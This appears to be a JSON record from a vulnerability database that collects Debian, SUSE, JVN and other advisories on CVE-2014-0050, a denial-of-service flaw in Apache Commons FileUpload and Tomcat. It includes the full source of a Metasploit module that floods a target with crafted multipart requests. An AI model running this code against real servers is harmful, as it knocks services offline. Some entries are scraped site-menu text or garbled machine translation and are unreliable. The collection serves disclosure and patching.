-------------------------------------------------------------------------\n\nPackage : libcommons-fileupload-java\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2014-0050\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2014-02-07T22:59:26", "published": "2014-02-07T22:59:26", "id": "DEBIAN:DSA-2856-1:D2DA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00026.html", "title": "[SECURITY] [DSA 2856-1] libcommons-fileupload-java security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-08T00:36:32", "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0 through 1.3 via a specially crafted Content-Type header. Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50 and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also uses Commons FileUpload as part of the Manager application.\n", "published": "2014-02-22T13:56:59", "type": "metasploit", "title": "Apache Commons FileUpload and Apache Tomcat DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',\n 'Description' => %q{\n This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.\n },\n 'Author' =>\n [\n 'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.\n 'ribeirux' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-0050'],\n ['URL', 'http://tomcat.apache.org/security-8.html'],\n ['URL', 'http://tomcat.apache.org/security-7.html']\n ],\n 'DisclosureDate' => '2014-02-06'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, \"The request URI\", '/']),\n OptInt.new('RLIMIT', [ true, \"Number of requests to send\",50])\n ])\n end\n\n def run\n boundary = \"0\"*4092\n opts = {\n 'method' => \"POST\",\n 'uri' => normalize_uri(target_uri.to_s),\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => \"#{boundary}00000\",\n 'headers' => {\n 'Accept' => '*/*'\n }\n }\n\n # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby\n # This should be rewritten with 1.upto() or Enumerable#each or\n # something\n for x in 1..datastore['RLIMIT']\n print_status(\"Sending request #{x} to #{peer}\")\n begin\n c = connect\n r = c.request_cgi(opts)\n c.send_request(r)\n # Don't wait for a response\n rescue ::Rex::ConnectionError => exception\n print_error(\"Unable to connect: '#{exception.message}'\")\n return\n ensure\n disconnect(c) if c\n end\n end\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb"}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n", "edition": 1, "modified": "2014-04-17T21:04:15", "published": "2014-04-17T21:04:15", "id": "SUSE-SU-2014:0548-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00015.html", "title": "Security update for jakarta-commons-fileupload (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "jvn": [{"lastseen": "2019-05-29T19:49:22", "bulletinFamily": "info", "cvelist": ["CVE-2014-0050"], "description": "\n ## Description\n\nApache Commons FileUpload provided by Apache Software Foundation contains an issue in processing a multi-part request, which may cause the process to be in an infinite loop. \n \nAs of 2014 February 12, an exploit tool to attack against this vulnerability has been confirmed.\n\n ## Impact\n\nProcessing a malformed request may cause the condition that the target system does not respond.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version that contains a fix fot this vulnerability: \n\n * [Apache Commons FileUpload 1.3.1](<http://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi>)\n * [Apache Tomcat 8.0.3](<http://www.apache.org/dist/tomcat/tomcat-8/v8.0.3/>)\n * [Apache Tomcat 7.0.52](<http://www.apache.org/dist/tomcat/tomcat-7/v7.0.52/>)\n * [Apache Struts 2.3.16.1](<http://struts.apache.org/download.cgi#struts23161>)\n**Apply the Patch** \nIn the developer's repository, the respective source code that contains a fix for this vulnerability has been released. \n\n * Apache Commons FileUpload: <http://svn.apache.org/r1565143>\n * Apache Tomcat 8: <http://svn.apache.org/r1565163>\n * Apache Tomcat 7: <http://svn.apache.org/r1565169>\n**Workaround** \nApplying the following workaround may mitigate the effect of this vulnerability. \n\n * Limit the Content-Type header size less than 4091 bytes\nFor more information, please refer to the developer's site. \n\n ## Products Affected\n\n * Commons FileUpload 1.0 to 1.3\n * Apache Tomcat 8.0.0-RC1 to 8.0.1\n * Apache Tomcat 7.0.0 to 7.0.50\n * Products that use Apache Commons FileUpload\nAccording to the developer, Apache Tomcat 6 and earlier are not affected. \n \nThe developer also states that Apache Commons FileUpload is widely used for multiple Apache products, therefore, multiple Apache products other than Apache Tomcat may be affected by this vulnerability. \nAccording to the developer, the following products may be affected. \n\n * Jenkins\n * JSPWiki\n * JXP\n * Lucene-Solr\n * onemind-commons\n * Spring\n * Stapler\n * Struts 1, 2\n * WSDL2c\n", "edition": 4, "modified": "2016-07-12T00:00:00", "published": "2014-02-10T00:00:00", "id": "JVN:14876762", "href": "http://jvn.jp/en/jp/JVN14876762/index.html", "title": "JVN#14876762: Apache Commons FileUpload vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-5573", "CVE-2013-7285"], "description": "\nJenkins Security Advisory reports:\n\nThis advisory announces multiple security vulnerabilities that\n\t were found in Jenkins core.\nPlease reference CVE/URL list for details\n\n", "edition": 7, "modified": "2014-02-14T00:00:00", "published": "2014-02-14T00:00:00", "id": "3E0507C6-9614-11E3-B3A5-00E0814CAB4E", "href": "https://vuxml.freebsd.org/freebsd/3e0507c6-9614-11e3-b3a5-00e0814cab4e.html", "title": "jenkins -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-07-25T19:46:39", "bulletinFamily": "info", "cvelist": ["CVE-2013-7285", "CVE-2019-10173"], "description": "## One, the Foreword\n\n**XStream is a commonly used Java class libraries used to serialize an object into XML, JSON or deserialize the object.**\n\n## Second, the vulnerability profile\n\nXstream 1.4.10 version exists deserialization vulnerability CVE-2013-7285 patch bypass.\n\n## Third, the vulnerability to hazards\n\nThe bucket like a security emergency response team analysis, when using Xstream 1.4.10 version and not on the security framework initialized, the attacker can carefully construct the request packet in use Xstream on the server to remote code execution.\n\n## Fourth, the scope of the impact\n\nProduct\n\nXstream\n\nVersion\n\nXstream1. 4. 10 version\n\nAssembly\n\nXstream\n\nFifth, the vulnerability reproduction\n\nNo\n\n## Six, solution\n\nUpgrade Xstream to 1. 4. 11 version\n\n## Seven, reference\n\n> http://x-stream.github.io/changes.html#1.4.11\n> \n> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10173\n\nThe above is the high-risk vulnerability and early warning related information, if you have any questions or need more support, you can contact us.\n\nContact phone: 400-156-9866\n\nEmail: help@tophant.com\n\nBucket like the Security Emergency Response Team\n\n2019 7 December 25\n", "edition": 1, "modified": "2019-07-25T00:00:00", "published": "2019-07-25T00:00:00", "id": "MYHACK58:62201995222", "href": "http://www.myhack58.com/Article/html/3/62/2019/95222.htm", "title": "Xstream remote code execution vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "huawei": [{"lastseen": "2019-02-01T18:02:28", "bulletinFamily": "software", "cvelist": ["CVE-2014-0116", "CVE-2014-0050", "CVE-2014-0094"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2014-07-08T00:00:00", "published": "2014-07-07T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "type": "huawei", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
